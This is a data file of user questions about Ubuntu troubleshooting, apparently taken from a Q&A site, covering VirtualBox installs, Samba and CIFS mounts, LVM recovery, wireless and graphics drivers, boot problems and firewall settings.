219148	ubuntu 12.10 installation in virtualbox	i am trying to install ubuntu 12.10 as guest in virtualbox in windows 7 machine . after intallation and copying the files , it asks me to restart now , and i click that button , but i get an error that virtualbox stopped working , and it prompts me to close virtualbox . when i restart virtualbox , the status in ubuntu is displayed as aborted and after restarting , it tries to reinstall ubuntu . i have tried thrice . how do i to resolve this issue ?
219150	cifs mounted nas drive not passing directory information	i have several nas drives connected to my server , which are then set up as symbolic links and shared via samba - to allow all the nas drives to look like 1 drive on the samba share . however , in all the drives i have mounted with cifs the directory information is not passed through , so that directories look like files on the share drive . for example - in a directory called boston legal , on the nas drive they are as follows : drwxr-xr-x 0 nobody nogroup 0 dec 7 2011 season 01 ( 2004 ) drwxr-xr-x 0 nobody nogroup 0 oct 16 2011 season 02 ( 2005 ) drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 03 ( 2006 ) drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 04 ( 2007 ) drwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 05 ( 2008 ) but when shared in samba they look like this : -rwxr-xr-x 0 nobody nogroup 0 dec 7 2011 season 01 ( 2004 ) -rwxr-xr-x 0 nobody nogroup 0 oct 16 2011 season 02 ( 2005 ) -rwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 03 ( 2006 ) -rwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 04 ( 2007 ) -rwxr-xr-x 0 nobody nogroup 0 jun 28 2011 season 05 ( 2008 ) as you can see the `` d '' flag is missing . this only happens from cifs mounted drives . here are my configurations : ( fstab ) /dev/sda1 /mnt/drive1 reiserfs defaults 0 2 /dev/sdc1 /mnt/drive3 reiserfs defaults 0 2 /dev/sdf1 /mnt/drive4 reiserfs defaults 0 2 /dev/sdd1 /mnt/drive5 reiserfs defaults 0 2 /dev/sdb1 /mnt/backups reiserfs defaults 0 2 //192.168.0.181/videos /mnt/nas_01 cifs iocharset=utf8 , uid=65534 , gid=65534 , guest , rw 0 0 //192.168.0.182/videos /mnt/nas_02 cifs iocharset=utf8 , uid=65534 , gid=65534 , guest , rw 0 0 then in a directory called /shares/videos varies folders from the various drives are symlinked : lrwxrwxrwx 1 nobody nogroup 29 mar 5 2012 terra nova - > /mnt/drive1/videos/terra nova lrwxrwxrwx 1 nobody nogroup 28 may 25 09:15 torchwood - > /mnt/drive5/videos/torchwood lrwxrwxrwx 1 nobody nogroup 30 mar 4 2012 tudors , the - > /mnt/nas_02/series/tudors , the lrwxrwxrwx 1 nobody nogroup 32 feb 28 2012 universe , the - > /mnt/nas_02/series/universe , the finally that directory is shared via samba : [ global ] follow symlinks = yes wide links = yes unix extensions = no ... . [ video ] path = /shares/video guest ok = yes read only = no this system used to work just fine when i was using smbfs , however , when it was removed and i had to switch to cifs all the directories in any of the cifs mounted drives no longer show as directories . any ideas ?
219151	is it possible to recover a partial lvm logical volume ?	background it is an ubuntu 12.04 virtualbox vm with 5 virtual hdds ( vdi ) , note this is just a test vm , so not well planned ahead : ubuntu.vdi for / ( /dev/mapper/ubuntu-root aka /dev/ubuntu/root ) and /home ( /dev/mapper/ubuntu-home ) weblogic.vdi - /dev/sdb ( mounted on /bea for weblogic and other stuff ) btrfs1.vdi - /dev/sdc ( part of btrfs -m raid1 -d raid1 configuration ) btrfs2.vdi - /dev/sdd ( part of btrfs -m raid1 -d raid1 configuration ) more.vdi - /dev/sde ( added this virtual hdd because / ran out of inodes and it was n't easy to figure out what to delete so as to free up inodes , so i just added the new virtual hdd , created pv , added it to existing volume group ubuntu , grew the root logical volume to work around the inode issue -_- ) what happened ? last friday , before finishing up i wanted to free up some disk space on that box , for some reason i thought the more.vdi was useless and tried to detach it from the vm , i then clicked delete ( should have clicked keep files damn ! ) by mistake when detaching . unfortunately i did n't have backup for it . all too late . what i have tried tried to undelete ( use testdisk and photorec ) the vdi files but it takes too long and recovered heaps of .vdi files that i did n't want ( huge , filled the disk , damn ! ) . i finally gave up . fortunately most of data is on separate ext4 partition and btrfs volumes . out of curiosity , i still tried to mount the logical volumes and see if it is possible to at least recover the /var and /etc i tried to use system rescue cd to boot and activate the volume groups , i got : could n't find device with uuid xxxx . refusing activation of the partial lv root . use -- partial to override . 1 logical volume ( s ) in volume group `` ubuntu '' now active . i was able to mount home lv but not root lv . i am wondering if it is possible to access the root lv any more . under the bonnet , data ( on lv root - / ) was striped to more.vdi ( pv ) , i know it 's almost impossible to to recover . but i am still curious about how system administrator/devops guys deal with this sort of situation ; - ) thanks in advance .
219154	zoneminder - fewer events , longer duration ?	i 've got zoneminder 1.25 installed on 12.04 lts 64 bit , and it 's working fine , but seems to capure many events ( modect , idle setting ) with short durations . some captures are only seconds apart , and when i watch an event , i do n't see the person walk all the way through the room , sometimes it stops with them partway through . how can i make the event captures longer ( so there are fewer of them , but they catch everything ) .
219155	if a shell script can run no matter which folder i 'm in.how can remove it from the environment ?	i am a green corn in ubuntu.my question might not be so accurate.the problem i am facing is ďźif i run the script 'runzdclient ' ( the name of the script ) directly in terminal , i get a warning 'invalid password or user name ' . however , if i click the script and run it , there are n't any problem.notice that the script can run irrespective of which the folder i am in . i guess that the script must be in the environment.here comes the problem : how can i remove the wrong script with the right one in the environment ?
219161	wireless networks are detected but not able to connect	i recently updated to ubuntu 12.04 . now i am able to see all the available wireless networks including mine but when i choose to connect to my network it does not respond or connect . please let me know if you have any suggestion also i fairly new to linux . thank you
219165	new 12.04 install on raid 0 with encrypted lvm for home and swap ?	i have an asus laptop with 2 new 320gb wd hdd 's . i want to do a raid 0 install , but want to put both my / and swap partitions under encrypted lvm for security . what is the best way to do this from the alternative cd ? do i just set up separate raid 0 partitions for boot , swap , and root ? i think going that route would put both swap and root and separate encrypted lvms . i do n't want to have to type two passwords at boot . thanks for any help you may give ... .i am not new to ubuntu or linux , but am fairly new to encrypted lvm .
219168	how do i remove files that i have downloaded from the dash ?	i am using ubuntu 12.04 lts . the problem is that the dashhome shows all the files and icons that i have downloaded and used and i want to remove them from the dashhome . can any one help how can i do it without nu-installing the applications .
219170	how to migrate all users to an new server	my file server which is running linux ubuntu 12.01 , contains more than 30 users and its samba user accounts . now i have an brand new machine , and want move all those user accounts from the old machine to the new one without re-creating all user accounts in the new machine . does anyone know how to do moving user account to a new machine please ?
219171	nautilus keep crashs on mounting samba drives	i am unable to use network drives on ubuntu 12.10 . i have 2 computers with windows xp and 7 all connected to a router .
219172	nautilus menu dissapeared	i did fresh install ubuntu 12.10 64 , i found that my nautilus menu ( file , edit , view ) is suddenly disappeared whenever i want to click on it . but it will showed up whenever i hovered my mouse somewhere else ( center-to-right of global menu bar ) anyone experience the same issue ? picture added : for example , if i want to click ( left area of global menu ) '' edit '' that appeared next to `` home folder '' it suddenly disappeared ! however , if i click somewhere in the center-to-right of global menu , the menu suddenly re-appeared .
219173	why nginx development version on ubuntu 12.04 lts and not stable version ?	i am having ubuntu 12.04 64 bit running with nginx 1.1.19 as per nginx release 1.1.19 is a development release.so why do ubuntu lts shipped with development release rather than stable release .
219176	how much partition ?	i 'm a new linux user and i feel like i messed up my partitions . i have around 600gb to use and it shows i have 5.5 gb of free space , so did i mess up my free space partitioning and would i just need to boot from the cd and change it ? i was n't 100 % sure on partitioning so i think i failed > . <
219177	some errors into the driver rt539x pcie	i have a laptop hp650 with wi fi chip rt539a . i 'm using os ubuntu 12.04 , but the wifi does not work on this os . the forum ubuntu gave me a couple of tips on how to solve these issues . here they are : download the linux driver ( rt5390pcie ) from ralink . extract it . the files will be extracted to 2010_1216_rt5390_linuxsta_v2.4.0.4_wifibtcombo_dpo folder . download all the patches except the x64_86 patch , assuming you have a 32-bit system , from opensuse website . copy the patches to the folder – 2010_1216_rt5390_linuxsta_v2.4.0.4_wifibtcombo_dpo goto the folder . make the following change in /os/linux/config.mk file – has_antenna_diversity_support=y ( originally was n ) sudo su cp rt2860sta.dat rt5390sta.dat mkdir -p /etc/wireless/rt5390sta cp rt5390sta.dat /etc/wireless/rt5390sta make clean make < - i have problems make install modprobe rt5390sta exit but at one stage when i run `` make '' , i have a compiler error : /home/hp650/rt/os/linux/../../common/cmm_asic.c : in function ‘asicgetautoagcoffsetfortemperaturesensor’ : /home/hp650/rt/os/linux/../../common/cmm_asic.c:1233:28 : warning : assignment discards ‘const’ qualifier from pointer target type [ enabled by default ] /home/hp650/rt/os/linux/../../common/cmm_asic.c:1246:28 : warning : assignment discards ‘const’ qualifier from pointer target type [ enabled by default ] cc [ m ] /home/hp650/rt/os/linux/../../common/cmm_cmd.o cc [ m ] /home/hp650/rt/os/linux/../../chips/rtmp_chip.o /home/hp650/rt/os/linux/../../chips/rtmp_chip.c : in function ‘hwantennadiversityenable’ : /home/hp650/rt/os/linux/../../chips/rtmp_chip.c:2010:2 : error : ‘regs’ undeclared ( first use in this function ) /home/hp650/rt/os/linux/../../chips/rtmp_chip.c:2010:2 : note : each undeclared identifier is reported only once for each function it appears in make [ 2 ] : *** [ /home/hp650/rt/os/linux/../../chips/rtmp_chip.o ] error 1 make [ 1 ] : *** [ _module_/home/hp650/rt/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-29-generic-pae' make : *** [ linux ] error 2 someone can help me in this matter ?
219186	how do i create another user ?	i am new to ubuntu . on login only my single user with guest is displayed . is it possible to show multiple user names including admin user ? sudo sh -c 'echo `` greeter-show-manual-login=true '' > > /etc/lightdm/lightdm.conf' can you explain the above code usage ?
219190	startup black screen issue	when i start up my laptop after installing ubuntu all i get is a black screen with a dash in the top left corner i ca n't start up my laptop because of this please help
219194	dual screen does n't work on ubuntu	i 'm not an expert in linux but i 'm currently try to learn it myself . unfortunately i 'm stuck here . so , i 'm using ubuntu 64-bit ( with unity desktop ) on a laptop . i get stuck when i try to plug another screen to run linux in dual screen mode.i configured display ( with user-friendly control panel : settings- > display ) in dual boot mode and when i want to apply i get this error message : la configuration d'affichage sélectionnée ne peut pas être appliquée . la taille virtuelle demandée n'est pas adaptée à la taille disponible : demande= ( 2800 , 900 ) , minimum= ( 320 , 200 ) , maximum= ( 1440 , 1440 ) i 'm french and so is my linux . my graphic card is mobility radeon hd 5430 series , so i have downloaded and installed last drivers from ati web site but it does not resolve my problem . i even tried searching on google with my error message and tried the methods listed but it could not solve the problem . any help will be appreciated . just tell me if you need more information . thank you .
219195	how do i get kubuntu to open rtf files in libre office	using kubuntu 12.04.01 on a dual-boot computer , i have entered system settings > file association to open rtf and richtext files with libreoffice writer set as preference over kate and gnuemacs . i have several files with .rtf suffix originally created by windows , although modified and/or renamed by kubuntu . in spite of my having changed the file association as above , kubuntu insists on trying to open them from dolphin with kate which ca n't read them properly . `` open with '' is an easy workaround , but i believe kubuntu should do better . is it a minor bug , or have i missed something ? if a bug is it in kubuntu , libreoffice , or kate ?
219198	wubi.exe problems	i installed ubuntu via wubi , all the files were properly installed , etc . when i rebooted the system after the installation and chose ubuntu from 'chose os ' i got some error messages 'wubloader not found ' or something like that , then just a bunch of error messages , any ideas on how to fix it ? thanks
219199	how to enable apache solr service on rackspace ubuntu server ?	we have setup apache solr on rackspace dedicated ubuntu server . but , i think because of firewall this service is not available . i tried adding following line as per rackspace documentation : /sbin/iptables -i rh-firewall-1-input 1 -p tcp -- dport 8983 -j accept which returns me following result : iptables : no chain/target/match by that name . please find below the result from the command iptables -l -n : chain input ( policy drop ) target prot opt source destination accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:443 accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 fail2ban-ssh tcp -- 0.0.0.0/0 0.0.0.0/0 multiport dports 22 ufw-before-logging-input all -- 0.0.0.0/0 0.0.0.0/0 ufw-before-input all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-input all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-logging-input all -- 0.0.0.0/0 0.0.0.0/0 ufw-reject-input all -- 0.0.0.0/0 0.0.0.0/0 ufw-track-input all -- 0.0.0.0/0 0.0.0.0/0 chain forward ( policy drop ) target prot opt source destination ufw-before-logging-forward all -- 0.0.0.0/0 0.0.0.0/0 ufw-before-forward all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-forward all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-logging-forward all -- 0.0.0.0/0 0.0.0.0/0 ufw-reject-forward all -- 0.0.0.0/0 0.0.0.0/0 chain output ( policy accept ) target prot opt source destination ufw-before-logging-output all -- 0.0.0.0/0 0.0.0.0/0 ufw-before-output all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-output all -- 0.0.0.0/0 0.0.0.0/0 ufw-after-logging-output all -- 0.0.0.0/0 0.0.0.0/0 ufw-reject-output all -- 0.0.0.0/0 0.0.0.0/0 ufw-track-output all -- 0.0.0.0/0 0.0.0.0/0 chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-after-forward ( 1 references ) target prot opt source destination chain ufw-after-input ( 1 references ) target prot opt source destination ufw-skip-to-policy-input udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:137 ufw-skip-to-policy-input udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:138 ufw-skip-to-policy-input tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:139 ufw-skip-to-policy-input tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:445 ufw-skip-to-policy-input udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:67 ufw-skip-to-policy-input udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:68 ufw-skip-to-policy-input all -- 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type broadcast chain ufw-after-logging-forward ( 1 references ) target prot opt source destination log all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw-after-logging-input ( 1 references ) target prot opt source destination log all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw-after-logging-output ( 1 references ) target prot opt source destination chain ufw-after-output ( 1 references ) target prot opt source destination chain ufw-before-forward ( 1 references ) target prot opt source destination ufw-user-forward all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-before-input ( 1 references ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established ufw-logging-deny all -- 0.0.0.0/0 0.0.0.0/0 state invalid drop all -- 0.0.0.0/0 0.0.0.0/0 state invalid accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 3 accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 4 accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 11 accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 12 accept icmp -- 0.0.0.0/0 0.0.0.0/0 icmptype 8 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp spt:67 dpt:68 ufw-not-local all -- 0.0.0.0/0 0.0.0.0/0 accept udp -- 0.0.0.0/0 224.0.0.251 udp dpt:5353 accept udp -- 0.0.0.0/0 239.255.255.250 udp dpt:1900 ufw-user-input all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-before-logging-forward ( 1 references ) target prot opt source destination chain ufw-before-logging-input ( 1 references ) target prot opt source destination chain ufw-before-logging-output ( 1 references ) target prot opt source destination chain ufw-before-output ( 1 references ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 accept all -- 0.0.0.0/0 0.0.0.0/0 state related , established ufw-user-output all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-logging-allow ( 0 references ) target prot opt source destination log all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw allow ] `` chain ufw-logging-deny ( 2 references ) target prot opt source destination return all -- 0.0.0.0/0 0.0.0.0/0 state invalid limit : avg 3/min burst 10 log all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 log flags 0 level 4 prefix `` [ ufw block ] `` chain ufw-not-local ( 1 references ) target prot opt source destination return all -- 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type local return all -- 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type multicast return all -- 0.0.0.0/0 0.0.0.0/0 addrtype match dst-type broadcast ufw-logging-deny all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 10 drop all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-reject-forward ( 1 references ) target prot opt source destination chain ufw-reject-input ( 1 references ) target prot opt source destination chain ufw-reject-output ( 1 references ) target prot opt source destination chain ufw-skip-to-policy-forward ( 0 references ) target prot opt source destination drop all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-skip-to-policy-input ( 7 references ) target prot opt source destination drop all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-skip-to-policy-output ( 0 references ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-track-input ( 1 references ) target prot opt source destination chain ufw-track-output ( 1 references ) target prot opt source destination accept tcp -- 0.0.0.0/0 0.0.0.0/0 state new accept udp -- 0.0.0.0/0 0.0.0.0/0 state new chain ufw-user-forward ( 1 references ) target prot opt source destination chain ufw-user-input ( 1 references ) target prot opt source destination accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:22 /* 'dapp_openssh ' */ accept tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:1111 accept udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:1111 accept all -- 174.143.23.0/25 0.0.0.0/0 accept all -- 50.56.142.128/26 0.0.0.0/0 accept all -- 180.150.149.64/26 0.0.0.0/0 accept all -- 69.20.52.192/26 0.0.0.0/0 accept all -- 78.136.44.0/26 0.0.0.0/0 accept all -- 50.57.61.0/26 0.0.0.0/0 chain ufw-user-limit ( 0 references ) target prot opt source destination log all -- 0.0.0.0/0 0.0.0.0/0 limit : avg 3/min burst 5 log flags 0 level 4 prefix `` [ ufw limit block ] `` reject all -- 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain ufw-user-limit-accept ( 0 references ) target prot opt source destination accept all -- 0.0.0.0/0 0.0.0.0/0 chain ufw-user-logging-forward ( 0 references ) target prot opt source destination chain ufw-user-logging-input ( 0 references ) target prot opt source destination chain ufw-user-logging-output ( 0 references ) target prot opt source destination chain ufw-user-output ( 1 references ) target prot opt source destination please guide me to the right direction . thanks , vishal
219203	huwaei modem not working	yesterday i installed 12.10 in my sony vaio laptop . i have huwaei e173 3g modem , i simply inserted that modem into usb slot , after a few seconds modem started blinking and activated . i opened network profile and created a new network under 'mobile broadband ' tab everything was automated and i felt awesome , infact i used net for a while . next morning , i placed modem into usb , but nothing happened , no sign of modem presence even the modem is not blinking , i tried creating a new connection once again but attained no luck . kindly help me in resolving this problem .
219211	simulate monitor device	i 'm having an old pc running ubuntu desktop edition , with no keyboard / mouse / screen - i 'm accessing it only via ssh . i 'd like to run x11 for using vnc - however - startx commands returns fatal server error : no screens found how do i simulate the screen in order to use vnc ?
219216	shift + f3 ( backward search ) doesn ' work in google chrome in xubuntu	i have a problem : shift + f3 ( backward search ) doesn ' work in web browser in xubuntu . does anybody know how to solve it ? p.s . i 'm not sure 100 percent , but from what i see in hotkeys in system settings , no action is assigned on this keys combination .
219219	apple alu keyboard hungarian layout 0 and ă­ swapped	i 'm using a hungarian apple alu keyboard . it works well , apart from that the 0 and the ă­ keys are swapped . i read here that it could be re-mapped with an .xmodmap file in the home folder . what i do n't know is how could i find out the appropriate keycodes to override ? is there maybe some `` spy '' tool that echoes keys pressed ?
219221	how to install ubuntu ultimate edition using wubi ?	i had some trouble installing ubuntu ultimate edition 2.9 on my friend 's computer using wubi . wubi just does n't accept installation and gives only 2 options - 'demo & install ' and 'learn more ' . tried searching the internet for a solution but could n't find anything . is it wubi 's fault or is it not designed to give support for ue ? if latter , what is the alternative to it ( without actually giving ubuntu ue a seperate partition ) . question diverted to unix & linux : how to install ubuntu ultimate edition using wubi ?
219224	how to install graphics drivers ( no additional drivers under software sources ) ?	i am using ubuntu gnome remix 12.10 with ati mobility radeon hd 4300 graphics card . software sources do not show any additional drivers . how do i install the graphics drivers for my system ? $ lspci | grep vga 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710 [ mobility radeon hd 4300 series ]
219226	ubuntu is not getting booted ?	i have installed ubuntu 12.04 on windows 7 pc on seperate disk partition ( that is e : \ drive ) . installation is complete . now the system is always booting in windows 7 . i opted for dual boot at the time of installation . but system directly booting windows without asking anything . what is to be done next ?
219234	firefox unresponsive due to lock files , how do i remove them ?	as my laptop hard rive was knackered i was adivsed to use ubuntu , it set-up perfectly . but i tried downloading google chrome and flash player because i couldnt watch any videos and now firefox has become unresponsive . it says firefox is already running but it is not responding . to open a new window , you must first close the exisitng firefox process or restart your system . i tried restarting but that has n't worked . ubuntu also asked me if i wanted to do a update which i did , could this be a problem also . when i try to delete the files , it tells me the following : the link ''lock '' is broken . move it to the rubbish bin . this link can not be used , because it 's target '127.0.1.1 ; +1885 '' does n't exist killing the process does not work either .
219235	ubuntu 12.10 live-usb wo n't boot	i own an aleutia `` tango '' low power pc . it uses a intel atom cpu n2800 @ 1.86ghz processor . i know there are linux issues with the `` cedar trail '' graphics on this hardware but i can happily run ubuntu 12.04 using the vesa graphics driver . i wanted to try out ubuntu 12.10 so i created a live usb under 12.04 but i am unable to get this to boot . it gets as far as the grub screen but after that the monitor shuts down . i have tried the f6 `` nomodeset '' option but that does n't make any difference . does anyone have any knowledge of this problem ? thanks in advance .
219236	how to update graphics card driver in ubuntu 12.04.1	i have an asus eee r101 pc , and wonder if anyone knows how to update the graphics drive in ubuntu 12.04
219240	downgrading transmission	i am registered in one of the private torrent sites and according to the site rules , some torrent clients are allowed , others are banned . they happen to recommend the torrent client transmission version 1.93 , but my system has the version 2.51 , is there any way i can downgrade to 1.93 ?
219241	how to recover deleted folders or files ( by shift+delete ) from an ntfs partition	i have a 80 gb hdd in which ubuntu is installed alongside windows . i also have a 500 gb hdd having 3 partitions in which i store my data . actually i mistakenly deleted a folder permanently in one of the partition which is of 381 gb . that folder had all the movies in it and it accounted for almost 200 gb space of that partition . now i am in great trouble as all my data is lost . please someone suggest me a simple tool to recover that folder and all the files in it because i am only 13 years old and do n't understand ubuntu much.. ! !
219242	how do i pause/resume download and install from terminal ?	i mostly use terminal for installation of programs ( as does mostly everybody ) . however , at times ( particularly when i have low battery and no charger wire or more importantly , when installer file is too big , installation is incomplete and i need to power down my system ) i would like to pause the installation ( while it is in downloading state ) so that i wo n't loose already downloaded files . how do i do this ?
219244	atheros driver was there and now its gone !	i just installed ubuntu on my hard drive . i am not connected to the internet because ubuntu does not recognize my atheros ar8161 ethernet . therefore i have downloaded a total of 11 files in order to make build-essential and linux headers . i then use this package to make the driver module : compat-wireless-3.5.4-1-snpc right after i installed ubuntu , i ran all this and it worked . ubuntu recognized my driver . but then when i rebooted everything was gone ! firstly , i do n't want to have to go through all this every time i boot ubuntu . secondly , i did exactly what i did the first time , but now the second time i get error messages . here is the output : http : //paste.ubuntu.com/1369897/ you can see from the output that build essential and linux headers are ready to go ... .i think ... .maybe i didnt wait long enough ?
219248	ca n't boot in ubuntu after windows upgrade	after my lastest update for ubuntu and windows xp , i got a grub error on booting the next day . ls lists the following ( without ( ) ) : sd0 sd1 , msdos sd2 sd5 sd6 when i tried to get into one with ( sd0 , xy ) / it does n't detect system or unknown file system error . i tried to boot to a live session with a knoppix live cd and found out that all data exists . i also tried to recover with testdisk and it finds all systems . here is the test disk result : start end size in sectors 1 * hpfs - ntfs 0 1 1 7079 254 63 113740137 2 e extended lba 7080 0 1 12161 254 63 81642330 5 l hpfs - ntfs 7080 1 1 10266 254 63 51199092 [ schule ] x extended 12031 30 1 12161 254 63 2102625 6 l linux swap 12031 31 33 12161 254 63 2102530 i 've 1 winxp-home , 1x ubuntu ( ext3+swap ) and 1 winxp prof and then i wrote on mbr with testdisk but i always get the same errors with grub . what should i do ? i need both xp and ubuntu . help me please . more infos in answers below - sry for thos confusing style but im working on diff live system and browsers and have to reboot always the boot info script output is also down below maybe an advanced user can correct my fail posting - after i can solve my issuse i will register here thanx and pls help me with those weired issues ! as i still cant just comment my own answer or those on top i again has to put it here as a sepperate answer ... .. ( or even edit - maybe an browser failur using the live cds ... cause this posti can edit ) here the bootinfo script output - but the result is the same as with testdisk ... but it looks worse - cause it also doesnt detect my old ubuntu ... but there wasnt a eares process or overwrite process visibile ending the last working session output : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sda . sda1 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : /boot.ini /ntldr /ntdetect.com sda2 : __________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 63 . operating system : windows xp boot files : sda6 : __________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 100.0 gb , 100030242816 bytes 255 heads , 63 sectors/track , 12161 cylinders , total 195371568 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 63 113,740,199 113,740,137 7 ntfs / exfat / hpfs /dev/sda2 113,740,200 195,382,529 81,642,330 f w95 extended ( lba ) /dev/sda5 113,740,263 164,939,354 51,199,092 7 ntfs / exfat / hpfs /dev/sda6 193,280,000 195,382,529 2,102,530 82 linux swap / solaris /dev/sda2 ends after the last sector of /dev/sda /dev/sda6 ends after the last sector of /dev/sda '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 6596d86768011128 ntfs /dev/sda5 1300d3b7744ec141 ntfs schule /dev/sda6 5b95f2a1-4145-43a5-ac51-41d7dd32b213 swap ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) ================================ sda1/boot.ini : ================================ [ boot loader ] timeout=30 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp home edition '' /fastdetect /noexecute=optout multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 2 ) \windows= '' microsoft windows xp professional '' /fastdetect [ spybotsd ] timeout.old=30 the last part shows that i now use the windows boot loader so that i can acces at least one os but shouldnt i also get acces to my ubuntu partitions with live-linux-cds ? or do i have to boot with grub to get to those files only ? ?
219249	error while installing drivers	when i tried to install additional drivers in ubuntu 12.02 via terminal , i got this error message : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current [ sudo ] password for reidsr : error : need a repository as argument can anyone tell me what 's wrong ? reidar
219252	can i still use android ?	is it possible to choose which system i 'd like to run when i start the device . probably not i think ... and if it 's not working , is there anybody that works on a project that allows users to choose whether to boot android or ubuntu ?
219261	canon pixma mx870 ca n't use papers from the cassette tray	i 've successfully added my printer via ubuntu 12.04 default drivers , but it seems the driver does n't support using papers from the cassette tray even if i set the default preference to use the cassette only . each time i print the document , i always check this setting , as well as the status of the cassette ( there are at least 10 pieces of papers inside ) . screenshot : http : //img39.imageshack.us/img39/8128/screenshotfrom201211191.png the warning message i receive from the printer is that there is no paper at the rear tray ! i do n't have such issues with my windows 7 pro . please advise . thanks !
219263	how do i disable keyboard shortcuts ?	i must have accidentally activate some keyboard shortcut function because every time i press certain keys such as w , a , s , d they act as shortcuts to things . for example if i press f , the search function appears . how can i stop this so i can type these letters again ?
219264	problem with the `` sudo apt-get update '' command	i 'm a beginner when it comes to the linux environment . i recently tried to install some extensions in linux . i 've entered some commands like : sudo apt-get install gnome-tweak-tool and then when i tried to update with : sudo apt-get update i received this message : e : type 'me ' is not known on line 2 in source list /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list each time when i want to update i receive this error . does anyone have any ideas as to how i may correct this problem ?
219265	matlab r2012a installation issue	i activated my student version of matlab r2012a on the mathworks website with my original host id ( my mac address ) . for some reason matlab thinks that my host id is 0000..0 ( sequence of zeros ) when i open matlab . it exits with an error saying that this version of matlab is registered with some other host id other than your computer 's host id ( 00000000 ) . its true because my hostid is not a sequence of zeros . what do i do ? i installed matlab student version on my ubuntu 12.04 64 bit os . i installed ia32-libs too .
219266	how to get/install/activate a broadcom 4312 wl driver in ubuntu 12.10	i have installed ubuntu 12.10 on my lenovo g550 laptop . it has a broadcom 4312 wireless lan adapter which is not working . 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) how do i fix it ? how can i see what drivers are being used ? i 've downloaded what i think is the driver from the broadcom site but have no idea how to get it installed . please keep in mind that i 'm completely new at this linux stuff .
219268	which ubuntu version for oracle application express	i am new to linux and want to set up a simple ( hassle free ) development environment for oracle 's application express . as a personal development environment , i do not anticipate any more than one or two users at a time . o/s must support local access to the database as well as remote access to the database . would ubuntu desktop serve my purposes ?
219273	installing nux for unity development	i read the article here http : //unity.ubuntu.com/getinvolved/development/unity/ about installing nux and unity to work on development . i followed the steps in the building nux section . i added the functions to bashrc and ran remake-autogen-project . this ran without errors . it also says that it installed in the script . i then tried to build unity and it said it was missing the nux requirement of being > =nux4.0.0 . what did i do wrong not to have or install nux 4.0.0 ? thanks
219275	how do i install a graphics drive ?	can i install a graphics-drive update using wine ?
